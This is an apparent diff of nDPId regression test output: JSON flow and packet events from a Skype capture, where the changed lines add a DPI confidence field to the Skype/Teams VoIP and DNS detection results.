 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoHIAAEARwNrAqAEiQAQXkTLdnFgALcyQnJYCZ5BZSWZ\/iXC28\/gJa4xy6SADRNB7IBe6OkY8K1Ib90nh6Q=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2TSkAAEARlefAqAEinTc4pTLdnFQAIg\/nnJgCnGl25qOBTIS5Gpv0M8FAGs9\/YbWac7o="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -712,20 +712,20 @@
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03rMAAEARUOLAqAEi1cezkTLdnFsAIONWnJoCpMZAnYkDnzYrDpEHe3Wyl3Fm6DsP"}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA38a4AAEARPmXAqAEinTfroDLdnFsAI2YonJwCbYbrE4NbR6JS44ONijeTgTVa37UWYcSt"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/mMEAAEARl0\/AqAEinTfrmzLdnEMAK8StnJ4Ceg13qBmaNbQ5r3u++QJg+\/7hY4I5I2kK1W2d7qoWGw0="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431969692507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969692507,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlm8AAEARZQTAqAEib91NkjLdgQkALPOBnKACf9Ciuj22pCihR6NIjTKXTxwVlkuMzvocVlIJl4RJ8z3V"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="}
@@ -741,14 +741,14 @@
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431969698508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1431969698508,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIoEQAAEARVbXAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431969698743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431969698743,"pkt":"0NQSxnP1PBXCt3IOCABFAABEy5wAAEARK5nAqAEiwKgBAfdZADUAMBpr\/I4BAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1431969698797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1431969698797,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA191kAQKAy\/I6BgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAABAABBfOIaY="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"}
